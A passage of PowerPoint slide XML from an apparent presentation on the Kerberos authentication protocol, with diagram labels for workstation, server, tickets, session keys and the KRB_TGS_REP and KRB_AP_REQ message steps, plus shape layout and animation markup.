              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture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22319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="117" name="Workstation Large"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="260877" y="1698423"/>
            <a:ext cx="2745305" cy="3312979"/>
            <a:chOff x="5269256" y="151840"/>
            <a:chExt cx="2745305" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="118" name="Picture 1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313877" y="302498"/>
              <a:ext cx="2700684" cy="3162321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="119" name="Group 118"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5269256" y="151840"/>
              <a:ext cx="2685437" cy="665914"/>
              <a:chOff x="2925296" y="1597991"/>
              <a:chExt cx="2685437" cy="665914"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="120" name="TextBox 119"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042792" y="1832275"/>
                <a:ext cx="2567940" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Workstation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="121" name="TextBox 120"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042793" y="2079239"/>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122" name="Picture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25296" y="1597991"/>
                <a:ext cx="566691" cy="526075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Right Arrow 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3336423" y="2252444"/>
            <a:ext cx="2502616"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4. KRB_TGS_REP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HTTP/Server</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Reply Content"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3338458" y="2479902"/>
            <a:ext cx="2500581" cy="1948004"/>
            <a:chOff x="3338458" y="2479902"/>
            <a:chExt cx="2500581" cy="1948004"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Reply Content"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3338458" y="2479902"/>
              <a:ext cx="2500581" cy="1948004"/>
              <a:chOff x="3338458" y="2980453"/>
              <a:chExt cx="2500581" cy="1948004"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 35"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3338458" y="2980453"/>
                <a:ext cx="2500581" cy="1948004"/>
                <a:chOff x="3111530" y="3857261"/>
                <a:chExt cx="2500581" cy="1948004"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="38" name="Group 37"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3111530" y="3857261"/>
                  <a:ext cx="2500581" cy="1948004"/>
                  <a:chOff x="3111530" y="3857261"/>
                  <a:chExt cx="2500581" cy="1948004"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="40" name="Rectangle 39"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3111530" y="3857261"/>
                    <a:ext cx="2500581" cy="194800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spcAft>
                        <a:spcPts val="1500"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="41" name="TextBox 40"/>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3692408" y="4173468"/>
                    <a:ext cx="1671680" cy="1415772"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr>
                      <a:spcAft>
                        <a:spcPts val="3000"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>Ticket Information</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:spcAft>
                        <a:spcPts val="3000"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>Session Key</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:spcAft>
                        <a:spcPts val="3000"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>Service Ticket</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="39" name="Picture 3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194617" y="3957926"/>
                  <a:ext cx="351058" cy="573771"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Picture 3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419874" y="4432339"/>
                <a:ext cx="475522" cy="315018"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="Picture 5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409743" y="3312778"/>
              <a:ext cx="358610" cy="354236"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Picture 1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036" y="2449595"/>
            <a:ext cx="327713" cy="327713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="TextBox 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975139" y="2474532"/>
            <a:ext cx="1789823" cy="2062103"/>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Ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>Ticket-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>Granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> Service Session Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Service Ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Session Key</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Picture 10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109" y="2890389"/>
            <a:ext cx="472016" cy="312696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106" name="Picture 10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3663" y="3316166"/>
            <a:ext cx="348452" cy="348452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Picture 10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4792" y="3838621"/>
            <a:ext cx="475522" cy="315018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Picture 5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54614" y="4246806"/>
            <a:ext cx="358610" cy="358610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206776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righ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3.88889E-6 -2.22222E-6 L -0.32466 0.01968 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-16233" y="972"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fad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117"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="117"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="105"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="105"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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0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5. Kerberos Application Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="615553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With the Kerberos application request (KRB_AP_REQ) the client requests data from the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Right Arrow 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7764945" y="-334661"/>
            <a:ext cx="617502"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endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="TextBox 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6510652" y="-437689"/>
            <a:ext cx="1223092" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>KRB_AP_REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="140" name="Workstation Small"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="260877" y="1700808"/>
            <a:ext cx="2745305" cy="2451771"/>
            <a:chOff x="195776" y="2708920"/>
            <a:chExt cx="2745305" cy="2451771"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="141" name="Picture 1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155" y="2855866"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142" name="TextBox 141"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="2939970"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="143" name="TextBox 142"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3183336"/>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144" name="Picture 1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866" y="3457211"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="145" name="TextBox 144"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3482148"/>
              <a:ext cx="1789823" cy="1246495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="146" name="Picture 1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776" y="2708920"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="147" name="Picture 1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6939" y="3898005"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="148" name="Picture 1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8493" y="4323782"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="149" name="Group 148"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6012160" y="1700808"/>
            <a:ext cx="2954284" cy="2504842"/>
            <a:chOff x="5771714" y="2855866"/>
            <a:chExt cx="2954284" cy="2504842"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="150" name="Picture 1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5677" y="3047692"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151" name="TextBox 150"/>
            <p:cNvSpPr txBox="1"/>
